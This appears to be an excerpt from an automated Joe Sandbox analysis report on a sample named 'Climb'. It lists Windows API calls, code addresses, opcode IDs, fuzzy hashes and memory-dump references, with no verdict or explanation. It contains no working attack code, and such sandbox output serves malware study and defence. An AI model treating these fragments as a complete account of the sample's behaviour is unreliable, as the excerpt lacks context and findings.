                                                                                                                                                                          • Opcode Fuzzy Hash: 5a6f0208f9e26254cb6d78b8ebe28ea057148c44e81b6cc09ee163d7d20b94ff
                                                                                                                                                                          • Instruction Fuzzy Hash: 69E06D786003118FD331AF64E915786BBE4EF08301F00892DE896C6B52EBB4D488CBA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 001239F0
                                                                                                                                                                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00123A05
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Temp$FileNamePath
                                                                                                                                                                          • String ID: aut
                                                                                                                                                                          • API String ID: 3285503233-3010740371
                                                                                                                                                                          • Opcode ID: b72154c1c97aae66700b10cf63b94ccd849044aae4157cee3a262ef17f522e37
                                                                                                                                                                          • Instruction ID: 146f02f86ac462c1df4083b0210fd144e5bf799e37fe7bd38158427a3fd00d0c
                                                                                                                                                                          • Opcode Fuzzy Hash: b72154c1c97aae66700b10cf63b94ccd849044aae4157cee3a262ef17f522e37
                                                                                                                                                                          • Instruction Fuzzy Hash: E7D05E7650032867DE20A764AC0EFCB7B7CDB45710F0002A1BA55920E1DAF0DA85CB90
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00142DC8
                                                                                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00142DDB
                                                                                                                                                                            • Part of subcall function 0011F292: Sleep.KERNEL32 ref: 0011F30A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                          • Opcode ID: fd8d863636a2ef7c063f42e38654672f4a29d7c9dcbf964ac323638883f8dcc4
                                                                                                                                                                          • Instruction ID: 2be801b06de90f9b1f577f01327ee413926348f5603bb5bc98b8d80b0a1b8fc5
                                                                                                                                                                          • Opcode Fuzzy Hash: fd8d863636a2ef7c063f42e38654672f4a29d7c9dcbf964ac323638883f8dcc4
                                                                                                                                                                          • Instruction Fuzzy Hash: 80D02239384310B7EA28B330BC0FFD23B20AF11B10F1088347309AA0E0CAE0A880C640
                                                                                                                                                                          APIs
                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00142E08
                                                                                                                                                                          • PostMessageW.USER32(00000000), ref: 00142E0F
                                                                                                                                                                            • Part of subcall function 0011F292: Sleep.KERNEL32 ref: 0011F30A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                          • API String ID: 529655941-2988720461
                                                                                                                                                                          • Opcode ID: e6d3040cac19c74f7679077c4bc41906cc2b12f627374027ee0b4d85d752523f
                                                                                                                                                                          • Instruction ID: 9a5a48fca0449dd956cd34cd1a9f56cb0eee8d5d17701ab67a8e5d52f3ae4c18
                                                                                                                                                                          • Opcode Fuzzy Hash: e6d3040cac19c74f7679077c4bc41906cc2b12f627374027ee0b4d85d752523f
                                                                                                                                                                          • Instruction Fuzzy Hash: 7BD022393C13107BFA28B330BC0FFC23B20AB12B10F1088347309AA0E0CAE0A880C644
                                                                                                                                                                          APIs
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000EC213
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 000EC221
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000EC27C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true
                                                                                                                                                                          • Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          • Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_21_2_b0000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1717984340-0
                                                                                                                                                                          • Opcode ID: 4dfaf3a766cf5ed8bf63fb4dd436c43d46a7aa9967ffa46603e8c2d595203467
                                                                                                                                                                          • Instruction ID: 420e480d5fec999037ae1aeddac2f87d22838ba1e982817b7f1b66e3aa9e1f35
                                                                                                                                                                          • Opcode Fuzzy Hash: 4dfaf3a766cf5ed8bf63fb4dd436c43d46a7aa9967ffa46603e8c2d595203467
                                                                                                                                                                          • Instruction Fuzzy Hash: 6B41D731604286EFEB618FE6C844EBE7BE5AF51710F24416DF956B72A1DB328D02C760